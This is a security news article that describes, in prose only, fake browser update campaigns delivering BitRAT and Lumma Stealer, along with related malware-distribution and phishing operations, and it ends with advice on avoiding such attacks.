Fake browser updates are being used to distribute remote access trojans (RATs) and information-stealing malware like BitRAT and Lumma Stealer (also known as LummaC2).
According to cybersecurity firm, these deceptive updates have been linked to several malware infections, including the notorious SocGholish malware.
The attack begins when a user visits a compromised website containing JavaScript code that redirects them to a fake browser update page (“chatgpt-app[.]cloud”). This page prompts the user to download a ZIP archive file (“Update.zip”) hosted on Discord, which is automatically downloaded to their device.
Cybercriminals often use Discord to disseminate malware, phishing campaigns, and spam. There are over 50,000 malicious links on Discord in the past six months.
The ZIP file contains another JavaScript file (“Update.js”) that executes PowerShell scripts, which then download additional payloads, including BitRAT and Lumma Stealer, disguised as PNG image files from a remote server.
The PowerShell scripts also establish persistence on the infected device and use a .NET-based loader to launch the final-stage malware. This loader is marketed as a “malware delivery service” since it deploys both BitRAT and Lumma Stealer.
BitRAT is a versatile RAT that allows attackers to steal data, mine cryptocurrency, download more malware, and control infected hosts remotely. Lumma Stealer, a commodity malware available for $250 to $1,000 per month since August 2022, can capture information from web browsers, crypto wallets, and other sensitive sources.
Fake browser update lures are a common tactic for cyber attackers to gain access to devices or networks. These attacks often use drive-by downloads and malvertising techniques. However, a new variant of the ClearFake campaign discovered by ReliaQuest tricks users into manually executing malicious PowerShell code under the guise of a browser update.
The malicious site displays an error message and instructs users to install a root certificate by copying and running obfuscated PowerShell code. This code clears the DNS cache, displays a message box, downloads more PowerShell code, and installs LummaC2 malware.
Lumma Stealer has become one of the most prevalent information stealers, alongside RedLine and Raccoon. In Q4 2023, the number of logs from LummaC2 increased by 110%, indicating its high success rate in infiltrating systems and exfiltrating data undetected.
Meanwhile, the researcher reported a new campaign using webhards (web hard drives) to distribute malicious installers for adult games and pirated software, leading to the deployment of various malware such as Orcus RAT, XMRig miner, 3proxy, and XWorm.
Similar attack chains involving pirated software websites have led to the deployment of malware loaders like PrivateLoader and TaskLoader, which are offered as pay-per-install (PPI) services for other cybercriminals.
Additionally, researcher reported that CryptoChameleon uses DNSPod[.]com nameservers to support its phishing kit architecture. DNSPod, part of the Chinese company Tencent, is known for providing services to malicious operators. CryptoChameleon uses fast flux evasion techniques, allowing it to cycle through numerous IP addresses linked to a single domain name, evading traditional countermeasures and reducing the effectiveness of legacy indicators of compromise (IOCs).
To prevent falling victim to fake browser update attacks, always ensure your software is updated directly from the official website or through the software’s built-in update mechanism. Avoid clicking on update prompts from unfamiliar websites. Implement strong security measures such as firewalls, anti-virus programs, and intrusion detection systems.